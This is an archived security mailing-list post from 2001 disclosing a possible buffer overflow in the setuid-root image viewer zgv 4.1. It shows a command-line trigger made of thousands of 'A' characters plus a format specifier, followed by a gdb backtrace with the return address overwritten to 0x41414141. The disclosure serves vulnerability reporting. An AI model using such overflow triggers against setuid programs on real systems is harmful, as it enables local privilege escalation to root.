Possible security risk in setuid zgv 4.1 which may lead to local root comprimise. zgv is installed setuid root by default. onix# zgv -a "`perl -e 'print "A" x 4000'`%s" Segmentation fault (core dumped) onix# gdb -c core GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc. Core was generated by `zgv -a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40121a48 in ?? () (gdb) backtrace #0 0x40121a48 in ?? () #1 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:57 PDT